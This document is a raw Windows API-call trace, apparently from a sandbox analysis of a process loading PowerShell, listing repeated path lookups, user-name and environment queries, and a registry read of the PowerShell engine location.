	[0295.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x26ce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0295.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.725] SetErrorMode (uMode=0x1) returned 0x1
	[0295.725] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26d150 | out: lpFileInformation=0x26d150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0295.725] SetErrorMode (uMode=0x1) returned 0x1
	[0295.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.725] SetErrorMode (uMode=0x1) returned 0x1
	[0295.725] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26d150 | out: lpFileInformation=0x26d150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0295.725] SetErrorMode (uMode=0x1) returned 0x1
	[0295.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x26ce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.727] SetErrorMode (uMode=0x1) returned 0x1
	[0295.727] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26d410 | out: lpFileInformation=0x26d410*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0295.727] SetErrorMode (uMode=0x1) returned 0x1
	[0295.743] CoTaskMemAlloc (cb=0x804) returned 0x1b8ba750
	[0295.743] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8ba750, nSize=0x26d778 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d778) returned 0x1
	[0295.743] CoTaskMemFree (pv=0x1b8ba750) 
	[0295.743] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0295.743] GetUserNameW (in: lpBuffer=0x4c3ad0, pcbBuffer=0x26d7b8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d7b8) returned 1
	[0295.744] CoTaskMemFree (pv=0x4c3ad0) 
	[0295.744] ReportEventW (hEventLog=0x1bac0008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f225b8*="Available", lpRawData=0x2f22348) returned 1
	[0295.847] CoTaskMemAlloc (cb=0x104) returned 0x517f40
	[0295.847] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x517f40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.847] CoTaskMemFree (pv=0x517f40) 
	[0295.848] CoTaskMemAlloc (cb=0x104) returned 0x517f40
	[0295.848] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x517f40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.848] CoTaskMemFree (pv=0x517f40) 
	[0295.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.851] CoTaskMemAlloc (cb=0x104) returned 0x517f40
	[0295.851] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x517f40, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0295.851] CoTaskMemFree (pv=0x517f40) 
	[0295.851] CoTaskMemAlloc (cb=0x104) returned 0x517f40
	[0295.851] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x517f40, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0295.851] CoTaskMemFree (pv=0x517f40) 
	[0295.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.853] GetCurrentProcessId () returned 0x804
	[0295.854] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.857] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d798 | out: phkResult=0x26d798*=0x3ac) returned 0x0
	[0295.857] RegQueryValueExW (in: hKey=0x3ac, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d71c, lpData=0x0, lpcbData=0x26d718*=0x0 | out: lpType=0x26d71c*=0x1, lpData=0x0, lpcbData=0x26d718*=0x56) returned 0x0
	[0295.857] CoTaskMemAlloc (cb=0x5a) returned 0x1b89ba30
	[0295.857] RegQueryValueExW (in: hKey=0x3ac, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d6ec, lpData=0x1b89ba30, lpcbData=0x26d6e8*=0x56 | out: lpType=0x26d6ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d6e8*=0x56) returned 0x0
	[0295.858] CoTaskMemFree (pv=0x1b89ba30) 
	[0295.858] RegCloseKey (hKey=0x3ac) returned 0x0
	[0295.858] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.859] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.859] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.859] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.860] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.860] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.860] CoTaskMemAlloc (cb=0x104) returned 0x517f40
	[0295.860] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x517f40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.860] CoTaskMemFree (pv=0x517f40) 
	[0295.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
